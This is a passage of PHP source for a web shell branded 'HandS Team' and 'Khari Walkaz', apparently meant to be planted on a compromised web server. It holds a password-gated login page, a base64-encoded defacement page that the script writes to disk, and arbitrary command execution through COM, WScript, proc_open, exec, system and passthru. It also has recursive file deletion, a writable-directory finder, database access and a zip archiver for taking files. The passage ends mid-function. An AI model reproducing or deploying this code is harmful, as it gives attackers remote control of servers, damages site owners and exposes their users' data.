ZhciBlbmFibGVpbk5TNiA9IDEgLy9FbmFibGUgc2NyaXB0IGluIE5TNi9Nb3ppbGxhPyBTbm93IGFuaW1hdGlvbiBjb3VsZCBiZSBzbG93IGluIHRob3NlIGJyb3dzZXJzLiAoMT15ZXMsIDA9bm8pLgovL0VuZC4KdmFyIHkgPSBbXTsKdmFyIHggPSBbXTsKdmFyIGZhbGwgPSBbXTsKdmFyIHRoZUZsYWtlcyA9IFtdOwp2YXIgc2ZzID0gW107CnZhciBzdGVwID0gW107CnZhciBjdXJyU3RlcCA9IFtdOwp2YXIgaCx3LHI7CnZhciBkID0gZG9jdW1lbnQ7CnZhciBwaXggPSAicHgiOwp2YXIgZG9tV3cgPSAodHlwZW9mIHdpbmRvdy5pbm5lcldpZHRoID09ICJudW1iZXIiKTsKdmFyIGRvbVN5ID0gKHR5cGVvZiB3aW5kb3cucGFnZVlPZmZzZXQgPT0gIm51bWJlciIpOwp2YXIgaWR4ID0gZC5nZXRFbGVtZW50c0J5VGFnTmFtZSgnZGl2JykubGVuZ3RoOwppZiAoZC5kb2N1bWVudEVsZW1lbnQuc3R5bGUgJiYgCnR5cGVvZiBkLmRvY3VtZW50RWxlbWVudC5zdHlsZS5Nb3pPcGFjaXR5ID09ICJzdHJpbmciKQpudW0gPSAxMjsKZm9yIChpID0gMDsgaSA8IG51bTsgaSsrKXsKc2ZzW2ldID0gTWF0aC5yb3VuZCgxICsgTWF0aC5yYW5kb20oKSAqIDEpOwpkb2N1bWVudC53cml0ZSgnPGRpdiBpZD0iZmxha2UnKyhpZHgraSkrJyIgc3R5bGU9InBvc2l0aW9uOmFic29sdXRlO3RvcDowcHg7bGVmdDowcHg7d2lkdGg6Jworc2ZzW2ldKydweDtoZWlnaHQ6JytzZnNbaV0rJ3B4O2JhY2tncm91bmQtY29sb3I6I2ZmZmZmZjtmb250LXNpemU6JytzZnNbaV0rJ3B4Ij48L2Rpdj4nKTsKY3VyclN0ZXBbaV0gPSAwOwpmYWxsW2ldID0gKHNmc1tpXSA9PSAxKT8KTWF0aC5yb3VuZCgyICsgTWF0aC5yYW5kb20oKSAqIDIpOiBNYXRoLnJvdW5kKDMgKyBNYXRoLnJhbmRvbSgpICogMik7CnN0ZXBbaV0gPSAoc2ZzW2ldID09IDEpPwowLjA1ICsgTWF0aC5yYW5kb20oKSAqIDAuMSA6IDAuMDUgKyBNYXRoLnJhbmRvbSgpICogMC4wNSA7Cn0KaWYgKGRvbVd3KSByID0gd2luZG93OwplbHNleyAKICBpZiAoZC5kb2N1bWVudEVsZW1lbnQgJiYgCiAgdHlwZW9mIGQuZG9jdW1lbnRFbGVtZW50LmNsaWVudFdpZHRoID09ICJudW1iZXIiICYmIAogIGQuZG9jdW1lbnRFbGVtZW50LmNsaWVudFdpZHRoICE9IDApCiAgciA9IGQuZG9jdW1lbnRFbGVtZW50OwogZWxzZXsgCiAgaWYgKGQuYm9keSAmJiAKICB0eXBlb2YgZC5ib2R5LmNsaWVudFdpZHRoID09ICJudW1iZXIiKQogIHIgPSBkLmJvZHk7CiB9Cn0KZnVuY3Rpb24gd2luc2l6ZSgpewp2YXIgb2gsc3ksb3csc3gscmgscnc7CmlmIChkb21Xdyl7CmlmIChkLmRvY3VtZW50RWxlbWVudCAmJiBkLmRlZmF1bHRWaWV3ICYmIAp0eXBlb2YgZC5kZWZhdWx0Vmlldy5zY3JvbGxNYXhZID09ICJudW1iZXIiKXsKb2ggPSBkLmRvY3VtZW50RWxlbWVudC5vZmZzZXRIZWlnaHQ7CnN5ID0gZC5kZWZhdWx0Vmlldy5zY3JvbGxNYXhZOwpvdyA9IGQuZG9jdW1lbnRFbGVtZW50Lm9mZnNldFdpZHRoOwpzeCA9IGQuZGVmYXVsdFZpZXcuc2Nyb2xsTWF4WDsKcmggPSBvaC1zeTsKcncgPSBvdy1zeDsKfQplbHNlewpyaCA9IHIuaW5uZXJIZWlnaHQ7CnJ3ID0gci5pbm5lcldpZHRoOwp9CmggPSByaCAtIDI7ICAKdyA9IHJ3IC0gMjsgCn0KZWxzZXsKaCA9IHIuY2xpZW50SGVpZ2h0IC0gMjsgCncgPSByLmNsaWVudFdpZHRoIC0gMjsgCn0KfQpmdW5jdGlvbiBzY3JsKHl4KXsKdmFyIHkseDsKaWYgKGRvbVN5KXsKeSA9IHIucGFnZVlPZmZzZXQ7CnggPSByLnBhZ2VYT2Zmc2V0Owp9CmVsc2V7CnkgPSByLnNjcm9sbFRvcDsKeCA9IHIuc2Nyb2xsTGVmdDsKfQpyZXR1cm4gKHl4ID09IDApP3k6eDsKfQpmdW5jdGlvbiBzbm93KCl7CnZhciBkeSxkeDsKZm9yIChpID0gMDsgaSA8IG51bTsgaSsrKXsKZHkgPSBmYWxsW2ldOwpkeCA9IGZhbGxbaV0gKiBNYXRoLmNvcyhjdXJyU3RlcFtpXSk7CnlbaV0rPWR5Owp4W2ldKz1keDsgCmlmICh4W2ldID49IHcgfHwgeVtpXSA+PSBoKXsKeVtpXSA9IC0xMDsKeFtpXSA9IE1hdGgucm91bmQoTWF0aC5yYW5kb20oKSAqIHcpOwpmYWxsW2ldID0gKHNmc1tpXSA9PSAxKT8KTWF0aC5yb3VuZCgyICsgTWF0aC5yYW5kb20oKSAqIDIpOiBNYXRoLnJvdW5kKDMgKyBNYXRoLnJhbmRvbSgpICogMik7CnN0ZXBbaV0gPSAoc2ZzW2ldID09IDEpPwowLjA1ICsgTWF0aC5yYW5kb20oKSAqIDAuMSA6IDAuMDUgKyBNYXRoLnJhbmRvbSgpICogMC4wNSA7Cn0KdGhlRmxha2VzW2ldLnRvcCA9IHlbaV0gKyBzY3JsKDApICsgcGl4Owp0aGVGbGFrZXNbaV0ubGVmdCA9IHhbaV0gKyBzY3JsKDEpICsgcGl4OwpjdXJyU3RlcFtpXSs9c3RlcFtpXTsKfQpzZXRUaW1lb3V0KHNub3csdGltZXIpOwp9CmZ1bmN0aW9uIGluaXQoKXsKd2luc2l6ZSgpOwpmb3IgKGkgPSAwOyBpIDwgbnVtOyBpKyspewogdGhlRmxha2VzW2ldID0gZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoImZsYWtlIisoaWR4K2kpKS5zdHlsZTsKIHlbaV0gPSBNYXRoLnJvdW5kKE1hdGgucmFuZG9tKCkqaCk7CiB4W2ldID0gTWF0aC5yb3VuZChNYXRoLnJhbmRvbSgpKncpOwp9CnNub3coKTsKfQppZiAod2luZG93LmFkZEV2ZW50TGlzdGVuZXIpewogd2luZG93LmFkZEV2ZW50TGlzdGVuZXIoInJlc2l6ZSIsd2luc2l6ZSxmYWxzZSk7CiB3aW5kb3cuYWRkRXZlbnRMaXN0ZW5lcigibG9hZCIsaW5pdCxmYWxzZSk7Cn0gIAplbHNlIGlmICh3aW5kb3cuYXR0YWNoRXZlbnQpewogd2luZG93LmF0dGFjaEV2ZW50KCJvbnJlc2l6ZSIsd2luc2l6ZSk7CiB3aW5kb3cuYXR0YWNoRXZlbnQoIm9ubG9hZCIsaW5pdCk7Cn0gCn0pKCk7Cn0vL0VkaXQgQnk6IE1hcmlvbjAwMQo8L3NjcmlwdD4KPGRpdiBpZD0id2FycCI+CjxkaXYgaWQ9InRpdGxlIj4KPGNlbnRlcj4KPGgxPi46OiBIYW5kUyBUZWFtIDo6LjwvaDE+CjxkaXYgaWQ9InN1YmhlYWRlciI+PHA+SGFuZFMgVGVhbSBIYWNrZXIgR3JvdXA8L3A+PC9kaXY+CjwvY2VudGVyPgo8Y2VudGVyPgo8ZGl2IGlkPSJjb250ZW50Ij4KPGRpdiBpZD0ibWFzYWdlIj4KPGNlbnRlcj4KPHA+U2FmZV9tb2RlOiA8Zm9udCBjb2xvcj0icmVkIj48Yj5PRkY8L2I+PC9mb250PgkKPGZvbnQgc3R5bGU9ImNvbG9yOiB3aGl0ZTsgdGV4dC1zaGFkb3c6IDBweCAwcHggMHB4ICMxMTEsIDAgMCAwLjVlbSAjMzNmZjAwLCAwIDAgMC40ZW0gd2hpdGUiPjxjZW50ZXI+PGI+ISEhIEdyZXkgSGF0IEhhY2tlciBHcm91cHM8L2I+PC9jZW50ZXI+PC9mb250PjxiciAvPgo8L3A+CjwvZGl2Pgo8Y2VudGVyPjxmb250IGNvbG9yPSIjMDBGRjAwIiBzaXplPSI0cHgiPk1lbWJlciBUZWFtICEhITwvZm9udD48L2NlbnRlcj4gPDxtYXJxdWVlIGJlaGF2aW9yPSJzY3JvbGwiIGRpcmVjdGlvbj0ibGVmdCIgYmVoYXZpb3I9ImFsdGVybmF0ZSIgc2Nyb2xsYW1vdW50PSIyIiBzY3JvbGxkZWxheT0iOTAiIHdpZHRoPSI5MCUiPgo8Y2VudGVyPjxmb250IGNvbG9yPSIjQTZBNkE2IiBmYWNlPSJ2ZXJkYW5hIiBzaXplPSIyIj4KPHN0cm9uZz5DJiM0MTc7biBHacOzIC0gRHVjYWNlIFRyYW5nZWFzdCAtINW+1oXVtCDVvtaF1bQgLSBIY2UgQ3V0eU5oYW5naGVvIC0gTCYjMjI3O25nIFQmIzc5MTc7IEtpZHMgLSBOb2JsZSBIcCAtIEMmIzc4NDc7biBNJiM3ODk3O3QgQyYjMjI1O2kgVCYjMjM0O24gLSBOJiM3ODYzO2MgRGFuaCAtIEJhbmcgSHV5bmggLSBNYXJpb24wMDEgLSBWJiMzNjE7IFF1YW5nIE1pbmggLSBIdXkmIzc4NzM7biBUaG8mIzc4NDE7aSBDaCYjNDE3O2kgTiYjMjMzO3QgLSBJS2l6IC0gSGkmIzc4NzE7cCBIJiM3ODQxO20gLSBDJiMyMjQ7aSAtIFQmIzI0NDttIEgmIzI0OTttICYjMjcyOyYjNzg4NzsgLSBUaCYjMjI0O25oIFBoJiM3ODg5OyBDJiM3ODQ5O20gUGgmIzc4NDM7IC0gSEkmIzc4Nzk7cCBMJiMyMzQ7IC0gSG8mIzIyNDtuZyBUciYjMjM3OyAtIFQmIzIzNzsgTWF4IC0gUml2ZXIgV2luZCAtIE5ndXnDqm4gQXJ5IC0gS2V5eiBIYXhvciAtIEt1cm9iYSBLYWl0byAtIE5peCBBbmJ1IC0gU2NhciBQYXJhZGlzZSdzIC0gU2FpIC0gVGhlIFJ5Y2ggLSBWJiMzNjE7ICYjMjcyOyYjMjM2O25oIEtoJiMyNDQ7aSAtIEh5ZHJhIEhheG9yIC0gUXVheSBMJiM0MzI7bmcgLSBKYWNrIEZyb3N0IEthc3BlcnNreSBBbm9ucyAtIO+xnu+xniAtIE5nxrDhu51pIELDrG5oIFRoxrDhu51uZyAtIEgmIzIyNDtuaCBUaW5oIFhhbmggLSBOZ29uIE5oJiM3ODgxOyAtICYjMjcyOyYjMjI0O28gUXVhbmcgTWluaCAtIEMmIzc4NDc7biBDaGltIEMmIzc4NDM7bmggLSBCJiM3ODQxO2NoIEgmIzc4NDM7aSAmIzI3MjsmIzQzMjsmIzc5MDE7bmcgLSBBdHRhY2tlciBTbWlsZSAtIEJhbmcgSHV5bmggLSBIb2FuZyBMb25nIFZhbi4gQW5kIGFsbCBtZW1iZXIgSGFuZFMgVEVhbSEhITwvc3Ryb25nPjwvZm9udD48L2NlbnRlcj4KPC9tYXJxdWVlPgo8b2JqZWN0IHdpZHRoPSIwIiBoZWlnaHQ9IjAiPiAgPHBhcmFtIG5hbWU9Im1vdmllIiB2YWx1ZT0iaHR0cDovL3d3dy5uaGFjY3VhdHVpLmNvbS9tL2hTZzAyYVVXa3FMRCIgLz4gIDxwYXJhbSBuYW1lPSJxdWFsaXR5IiB2YWx1ZT0iaGlnaCIgLz4gIDxwYXJhbSBuYW1lPSJ3bW9kZSIgdmFsdWU9InRyYW5zcGFyZW50IiAvPiAgPHBhcmFtIG5hbWU9ImFsbG93c2NyaXB0YWNjZXNzIiB2YWx1ZT0iYWx3YXlzIiAvPiA8cGFyYW0gbmFtZT0iYWxsb3dmdWxsc2NyZWVuIiB2YWx1ZT0idHJ1ZSIvPiA8cGFyYW0gbmFtZT0iZmxhc2h2YXJzIiB2YWx1ZT0iYXV0b3N0YXJ0PXRydWUiIC8+ICA8ZW1iZWQgc3JjPSJodHRwOi8vd3d3Lm5oYWNjdWF0dWkuY29tL20vaFNnMDJhVVdrcUxEIiBmbGFzaHZhcnM9InRhcmdldD1ibGFuayZhdXRvc3RhcnQ9dHJ1ZSIgYWxsb3dzY3JpcHRhY2Nlc3M9ImFsd2F5cyIgYWxsb3dmdWxsc2NyZWVuPSJ0cnVlIiBxdWFsaXR5PSJoaWdoIiB3bW9kZT0idHJhbnNwYXJlbnQiIHR5cGU9ImFwcGxpY2F0aW9uL3gtc2hvY2t3YXZlLWZsYXNoIiB3aWR0aD0iMCIgaGVpZ2h0PSIwIj48L2VtYmVkPjwvb2JqZWN0Pgo8L2h0bWw+
';
$file = fopen("HandS-Team.html","w+");
$write = fwrite ($file ,base64_decode($perltoolss));
fclose($file);
echo "<iframe src=HandS-Team.html width=100% height=720px frameborder=0></iframe> ";
}
if ($action == 'shell') {
if (IS_WIN &&IS_COM) {
if($program &&$parameter) {
$shell= new COM('Shell.Application');
$a = $shell->ShellExecute($program,$parameter);
m('Program run has '.(!$a ?'success': 'fail'));
}
!$program &&$program = 'c:\windows\system32\cmd.exe';
!$parameter &&$parameter = '/c net start > '.SA_ROOT.'log.txt';
formhead(array('title'=>'Execute Program'));
makehide('action','shell');
makeinput(array('title'=>'Program','name'=>'program','value'=>$program,'newline'=>1));
p('<p>');
makeinput(array('title'=>'Parameter','name'=>'parameter','value'=>$parameter));
makeinput(array('name'=>'submit','class'=>'bt','type'=>'submit','value'=>'Execute'));
p('</p>');
formfoot();
}
formhead(array('title'=>'Execute Command'));
makehide('action','shell');
if (IS_WIN &&IS_COM) {
$execfuncdb = array('phpfunc'=>'phpfunc','wscript'=>'wscript','proc_open'=>'proc_open');
makeselect(array('title'=>'Use:','name'=>'execfunc','option'=>$execfuncdb,'selected'=>$execfunc,'newline'=>1));
}
p('<p>');
makeinput(array('title'=>'Command','name'=>'command','value'=>$command));
makeinput(array('name'=>'submit','class'=>'bt','type'=>'submit','value'=>'Execute'));
p('</p>');
formfoot();
if ($command) {
p('<hr width="100%" noshade /><pre>');
if ($execfunc=='wscript'&&IS_WIN &&IS_COM) {
$wsh = new COM('WScript.shell');
$exec = $wsh->exec('cmd.exe /c '.$command);
$stdout = $exec->StdOut();
$stroutput = $stdout->ReadAll();
echo $stroutput;
}elseif ($execfunc=='proc_open'&&IS_WIN &&IS_COM) {
$descriptorspec = array(
0 =>array('pipe','r'),
1 =>array('pipe','w'),
2 =>array('pipe','w')
);
$process = proc_open($_SERVER['COMSPEC'],$descriptorspec,$pipes);
if (is_resource($process)) {
fwrite($pipes[0],$command."\r\n");
fwrite($pipes[0],"exit\r\n");
fclose($pipes[0]);
while (!feof($pipes[1])) {
echo fgets($pipes[1],1024);
}
fclose($pipes[1]);
while (!feof($pipes[2])) {
echo fgets($pipes[2],1024);
}
fclose($pipes[2]);
proc_close($process);
}
}else {
echo(execute($command));
}
p('</pre>');
}
}
;echo '</td></tr></table>
<div style="padding:10px;border-bottom:1px solid #0E0E0E;border-top:1px solid #0E0E0E;background:#0E0E0E;">
        <span style="float:right;">';debuginfo();ob_end_flush();;echo '</span>
        Copyright @ 2016 .::[ Khari Walkaz ]::. Profile <a href=https://www.facebook.com/CNTTHK target=_blank><B> .::[ Khari Walkaz ]::. </B></a>
</div>
<iframe style="height:1px" src="" frameborder=0 width=1></iframe>
</body>
</html>
';
function m($msg) {
echo '<div style="background:rgba(241, 241, 241, 0.22);border:1px solid #00FF00;padding:15px;font:14px;text-align:center;font-weight:bold;">';
echo $msg;
echo '</div>';
}
function scookie($key,$value,$life = 0,$prefix = 1) {
global $admin,$timestamp,$_SERVER;
$key = ($prefix ?$admin['cookiepre'] : '').$key;
$life = $life ?$life : $admin['cookielife'];
$useport = $_SERVER['SERVER_PORT'] == 443 ?1 : 0;
setcookie($key,$value,$timestamp+$life,$admin['cookiepath'],$admin['cookiedomain'],$useport);
}
function multi($num,$perpage,$curpage,$tablename) {
$multipage = '';
if($num >$perpage) {
$page = 10;
$offset = 5;
$pages = @ceil($num / $perpage);
if($page >$pages) {
$from = 1;
$to = $pages;
}else {
$from = $curpage -$offset;
$to = $curpage +$page -$offset -1;
if($from <1) {
$to = $curpage +1 -$from;
$from = 1;
if(($to -$from) <$page &&($to -$from) <$pages) {
$to = $page;
}
}elseif($to >$pages) {
$from = $curpage -$pages +$to;
$to = $pages;
if(($to -$from) <$page &&($to -$from) <$pages) {
$from = $pages -$page +1;
}
}
}
$multipage = ($curpage -$offset >1 &&$pages >$page ?'<a href="javascript:settable(\''.$tablename.'\', \'\', 1);">First</a> ': '').($curpage >1 ?'<a href="javascript:settable(\''.$tablename.'\', \'\', '.($curpage -1).');">Prev</a> ': '');
for($i = $from;$i <= $to;$i++) {
$multipage .= $i == $curpage ?$i.' ': '<a href="javascript:settable(\''.$tablename.'\', \'\', '.$i.');">['.$i.']</a> ';
}
$multipage .= ($curpage <$pages ?'<a href="javascript:settable(\''.$tablename.'\', \'\', '.($curpage +1).');">Next</a>': '').($to <$pages ?' <a href="javascript:settable(\''.$tablename.'\', \'\', '.$pages.');">Last</a>': '');
$multipage = $multipage ?'<p>Pages: '.$multipage.'</p>': '';
}
return $multipage;
}
function loginpage() {
;echo '<html>
<head>
<link rel="shortcut icon" href="http://i.imgur.com/WtiYeZa.jpg" />
 
<body bgcolor=black background=https://media.giphy.com/media/fJ1eCBjmMoEvu/giphy.gif>
 
                <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<script language="javascript">
var rev = "fwd";
function titlebar(val)
{
var msg = "::. We are Noname Team .::";
var res = " ";
var speed = 100;
var pos = val;
msg = "=>[ "+msg+" ]<=";
var le = msg.length;
if(rev == "fwd"){
if(pos < le){
pos = pos+1;
scroll = msg.substr(0,pos);
document.title = scroll;
timer = window.setTimeout("titlebar("+pos+")",speed);
}
else{
rev = "bwd";
timer = window.setTimeout("titlebar("+pos+")",speed);
}
}
else{
if(pos > 0){
pos = pos-1;
var ale = le-pos;
scrol = msg.substr(ale,le);
document.title = scrol;
timer = window.setTimeout("titlebar("+pos+")",speed);
}
else{
rev = "fwd";
timer = window.setTimeout("titlebar("+pos+")",speed);
}
}
}
titlebar(0);
</script>
<style type="text/css">
A:link {text-decoration: none; color: green }
A:visited {text-decoration: none;color:red}
A:active {text-decoration: none}
A:hover {text-decoration: underline; color: green;}
input, textarea, button
{
        font-size: 11pt;
        color:  #FFFFFF;
        font-family: verdana, sans-serif;
        background-color: #000000;
        border-left: 2px dashed #8B0000;
        border-top: 2px dashed #8B0000;
        border-right: 2px dashed #8B0000;
        border-bottom: 2px dashed #8B0000;
}
 
</style>
 

<script language="javascript">
var rev = "fwd";
function titlebar(val)
{
var msg = "::. We are Noname Team .::";
var res = " ";
var speed = 100;
var pos = val;
msg = "===> "+msg+" <===";
var le = msg.length;
if(rev == "fwd"){
if(pos < le){
pos = pos+1;
scroll = msg.substr(0,pos);
document.title = scroll;
timer = window.setTimeout("titlebar("+pos+")",speed);
}
else{
rev = "bwd";
timer = window.setTimeout("titlebar("+pos+")",speed);
}
}
else{
if(pos > 0){
pos = pos-1;
var ale = le-pos;
scrol = msg.substr(ale,le);
document.title = scrol;
timer = window.setTimeout("titlebar("+pos+")",speed);
}
else{
rev = "fwd";
timer = window.setTimeout("titlebar("+pos+")",speed);
}
}
}
titlebar(0);
</script>	
<style type="text/css">body, a:hover {cursor: url(http://cur.cursors-4u.net/cursors/cur-8/cur740.ani), url(http://cur.cursors-4u.net/cursors/cur-8/cur740.png), progress !important;}</style><a href="http://www.cursors-4u.com/cursor/2011/01/22/night-diamond-20.html" target="_blank" title="Night Diamond"><img src="http://cur.cursors-4u.net/cursor.png" border="0" alt="Night Diamond" style="position:absolute; top: 0px; right: 0px;" /></a>
<body bgcolor="white" background="http://i50.tinypic.com/154x5s1.gif">


  <center>



<a href="https://www.facebook.com/CNTTHK" target="_blank"><img src="http://www.mediafire.com/convkey/7507/8j06luj1js6os2mzg.jpg" width="300" height="200" class="founder-img" style="margin-top: 5px;"></a><br> 




</center>    
       <BR><BR>
<div align=center >
<fieldset style="border: 1px solid rgb(69, 69, 69); padding: 4px;width:450px;bgcolor:white;align:center;font-family:tahoma;font-size:10pt"><legend><font color=red><B>Shell Mod By: Khari Walkaz</b></font></legend>
 
<div>
<font color=#99CC33>
<font color=#33ff00>==[ <B>Khari Walkaz</B> ]== </font><BR><BR>
 
<form method="POST" action="">
        <span style="font:10pt tahoma;">Vi&#7871;t M&#7853;t Kh&#7849;u: </span><input name="password" type="password" size="20">
        <input type="hidden" name="doing" value="login">
        <input type="submit" value="&#272;&#259;ng nh&#7853;p">
        </form>
<a href=https://www.facebook.com/CNTTHK target=_blank>Go To Facebook: .::[Khari Walkaz Profile]::. </a><BR></b>
<iframe width="0" height="0" src="https://www.youtube.com/embed/_B789lus-JE?rel=0;autoplay=1" frameborder="0" allowfullscreen></iframe>
<BR>
';
echo "".$err_mess."";
;echo ' <B><font color=#FFFFFF>
</div>
        </fieldset>
</head>
</html>
';
exit;
}
function execute($cfe) {
$res = '';
if ($cfe) {
if(function_exists('exec')) {
@exec($cfe,$res);
$res = join("\n",$res);
}elseif(function_exists('shell_exec')) {
$res = @shell_exec($cfe);
}elseif(function_exists('system')) {
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}elseif(function_exists('passthru')) {
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}elseif(@is_resource($f = @popen($cfe,"r"))) {
$res = '';
while(!@feof($f)) {
$res .= @fread($f,1024);
}
@pclose($f);
}
}
return $res;
}
function which($pr) {
$path = execute("which $pr");
return ($path ?$path : $pr);
}
function cf($fname,$text){
if($fp=@fopen($fname,'w')) {
@fputs($fp,base64_decode($text));
@fclose($fp);
}
}
function debuginfo() {
global $starttime;
$mtime = explode(' ',microtime());
$totaltime = number_format(($mtime[1] +$mtime[0] -$starttime),6);
echo 'X&#7917; L&#253; Trong '.$totaltime.' Gi&#226;y(s)';
}
function dbconn($dbhost,$dbuser,$dbpass,$dbname='',$charset='',$dbport='3306') {
if(!$link = @mysql_connect($dbhost.':'.$dbport,$dbuser,$dbpass)) {
p('<h2>Can not connect to MySQL server</h2>');
exit;
}
if($link &&$dbname) {
if (!@mysql_select_db($dbname,$link)) {
p('<h2>Database selected has error</h2>');
exit;
}
}
if($link &&mysql_get_server_info() >'4.1') {
if(in_array(strtolower($charset),array('gbk','big5','utf8'))) {
q("SET character_set_connection=$charset, character_set_results=$charset, character_set_client=binary;",$link);
}
}
return $link;
}
function s_array(&$array) {
if (is_array($array)) {
foreach ($array as $k =>$v) {
$array[$k] = s_array($v);
}
}else if (is_string($array)) {
$array = stripslashes($array);
}
return $array;
}
function html_clean($content) {
$content = htmlspecialchars($content);
$content = str_replace("\n","<br />",$content);
$content = str_replace("  ","&nbsp;&nbsp;",$content);
$content = str_replace("\t","&nbsp;&nbsp;&nbsp;&nbsp;",$content);
return $content;
}
function getChmod($filepath){
return substr(base_convert(@fileperms($filepath),10,8),-4);
}
function getPerms($filepath) {
$mode = @fileperms($filepath);
if (($mode &0xC000) === 0xC000) {$type = 's';}
elseif (($mode &0x4000) === 0x4000) {$type = 'd';}
elseif (($mode &0xA000) === 0xA000) {$type = 'l';}
elseif (($mode &0x8000) === 0x8000) {$type = '-';}
elseif (($mode &0x6000) === 0x6000) {$type = 'b';}
elseif (($mode &0x2000) === 0x2000) {$type = 'c';}
elseif (($mode &0x1000) === 0x1000) {$type = 'p';}
else {$type = '?';}
$owner['read'] = ($mode &00400) ?'r': '-';
$owner['write'] = ($mode &00200) ?'w': '-';
$owner['execute'] = ($mode &00100) ?'x': '-';
$group['read'] = ($mode &00040) ?'r': '-';
$group['write'] = ($mode &00020) ?'w': '-';
$group['execute'] = ($mode &00010) ?'x': '-';
$world['read'] = ($mode &00004) ?'r': '-';
$world['write'] = ($mode &00002) ?'w': '-';
$world['execute'] = ($mode &00001) ?'x': '-';
if( $mode &0x800 ) {$owner['execute'] = ($owner['execute']=='x') ?'s': 'S';}
if( $mode &0x400 ) {$group['execute'] = ($group['execute']=='x') ?'s': 'S';}
if( $mode &0x200 ) {$world['execute'] = ($world['execute']=='x') ?'t': 'T';}
return $type.$owner['read'].$owner['write'].$owner['execute'].$group['read'].$group['write'].$group['execute'].$world['read'].$world['write'].$world['execute'];
}
function getUser($filepath)     {
if (function_exists('posix_getpwuid')) {
$array = @posix_getpwuid(@fileowner($filepath));
if ($array &&is_array($array)) {
return ' / <a href="#" title="User: '.$array['name'].'&#13&#10Passwd: '.$array['passwd'].'&#13&#10Uid: '.$array['uid'].'&#13&#10gid: '.$array['gid'].'&#13&#10Gecos: '.$array['gecos'].'&#13&#10Dir: '.$array['dir'].'&#13&#10Shell: '.$array['shell'].'">'.$array['name'].'</a>';
}
}
return '';
}
function deltree($deldir) {
$mydir=@dir($deldir);
while($file=$mydir->read())     {
if((is_dir($deldir.'/'.$file)) &&($file!='.') &&($file!='..')) {
@chmod($deldir.'/'.$file,0777);
deltree($deldir.'/'.$file);
}
if (is_file($deldir.'/'.$file)) {
@chmod($deldir.'/'.$file,0777);
@unlink($deldir.'/'.$file);
}
}
$mydir->close();
@chmod($deldir,0777);
return @rmdir($deldir) ?1 : 0;
}
function bg() {
global $bgc;
return ($bgc++%2==0) ?'alt1': 'alt2';
}
function getPath($scriptpath,$nowpath) {
if ($nowpath == '.') {
$nowpath = $scriptpath;
}
$nowpath = str_replace('\\','/',$nowpath);
$nowpath = str_replace('//','/',$nowpath);
if (substr($nowpath,-1) != '/') {
$nowpath = $nowpath.'/';
}
return $nowpath;
}
function getUpPath($nowpath) {
$pathdb = explode('/',$nowpath);
$num = count($pathdb);
if ($num >2) {
unset($pathdb[$num-1],$pathdb[$num-2]);
}
$uppath = implode('/',$pathdb).'/';
$uppath = str_replace('//','/',$uppath);
return $uppath;
}
function getcfg($varname) {
$result = get_cfg_var($varname);
if ($result == 0) {
return 'No';
}elseif ($result == 1) {
return 'Yes';
}else {
return $result;
}
}
function getfun($funName) {
return (false !== function_exists($funName)) ?'Yes': 'No';
}
function GetList($dir){
global $dirdata,$j,$nowpath;
!$j &&$j=1;
if ($dh = opendir($dir)) {
while ($file = readdir($dh)) {
$f=str_replace('//','/',$dir.'/'.$file);
if($file!='.'&&$file!='..'&&is_dir($f)){
if (is_writable($f)) {
$dirdata[$j]['filename']=str_replace($nowpath,'',$f);
$dirdata[$j]['mtime']=@date('Y-m-d H:i:s',filemtime($f));
$dirdata[$j]['dirchmod']=getChmod($f);
$dirdata[$j]['dirperm']=getPerms($f);
$dirdata[$j]['dirlink']=ue($dir);
$dirdata[$j]['server_link']=$f;
$dirdata[$j]['client_link']=ue($f);
$j++;
}
GetList($f);
}
}
closedir($dh);
clearstatcache();
return $dirdata;
}else {
return array();
}
}
function qy($sql) {
$res = $error = '';
if(!$res = @mysql_query($sql)) {
return 0;
}else if(is_resource($res)) {
return 1;
}else {
return 2;
}
return 0;
}
function q($sql) {
return @mysql_query($sql);
}
function fr($qy){
mysql_free_result($qy);
}
function sizecount($size) {
if($size >1073741824) {
$size = round($size / 1073741824 * 100) / 100 .' G';
}elseif($size >1048576) {
$size = round($size / 1048576 * 100) / 100 .' M';
}elseif($size >1024) {
$size = round($size / 1024 * 100) / 100 .' K';
}else {
$size = $size .' B';
}
return $size;
}
class PHPZip{
var $out='';
function PHPZip($dir)   {
if (@function_exists('gzcompress'))     {
$curdir = getcwd();
if (is_array($dir)) $filelist = $dir;
else{
$filelist=$this ->GetFileList($dir);
foreach($filelist as $k=>$v) $filelist[]=substr($v,strlen($dir)+1);
}
if ((!empty($dir))&&(!is_array($dir))&&(file_exists($dir))) chdir($dir);
else chdir($curdir);
if (count($filelist)>0){
foreach($filelist as $filename){
if (is_file($filename)){
$fd = fopen ($filename,'r');
$content = @fread ($fd,filesize($filename));
fclose ($fd);
if (is_array($dir)) $filename = basename($filename);
$this ->addFile($content,$filename);
}
}
$this->out = $this ->file();
chdir($curdir);
}
return 1;
}
else return 0;
}
function GetFileList($dir){
static $a;
if (is_dir($dir)) {
if ($dh = opendir($dir)) {
while ($file = readdir($dh)) {
if($file!='.'&&$file!='..'){
$f=$dir .'/'.$file;
if(is_dir($f)) $this->GetFileList($f);
$a[]=$f;
}
}
closedir($dh);
}
}
return $a;
}
var $datasec      = array();
var $ctrl_dir     = array();
var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00";
var $old_offset   = 0;
function unix2DosTime($unixtime = 0) {
$timearray = ($unixtime == 0) ?getdate() : getdate($unixtime);
if ($timearray['year'] <1980) {
$timearray['year']    = 1980;
$timearray['mon']     = 1;
$timearray['mday']    = 1;
$timearray['hours']   = 0;
$timearray['minutes'] = 0;
$timearray['seconds'] = 0;
}
return (($timearray['year'] -1980) <<25) |($timearray['mon'] <<21) |($timearray['mday'] <<16) |
($timearray['hours'] <<11) |($timearray['minutes'] <<5) |($timearray['seconds'] >>1);
}
function addFile($data,$name,$time = 0) {
$name = str_replace('\\','/',$name);
$dtime = dechex($this->unix2DosTime($time));
$hexdtime       = '\x'.$dtime[6] .$dtime[7]
.'\x'.$dtime[4] .$dtime[5]
.'\x'.$dtime[2] .$dtime[3]
.'\x'.$dtime[0] .$dtime[1];
eval('$hexdtime = "'.$hexdtime .'";');
$fr     = "\x50\x4b\x03\x04";
$fr     .= "\x14\x00";
$fr     .= "\x00\x00";
$fr     .= "\x08\x00";
$fr     .= $hexdtime;
$unc_len = strlen($data);
$crc = crc32($data);
$zdata = gzcompress($data);
$c_len = strlen($zdata);
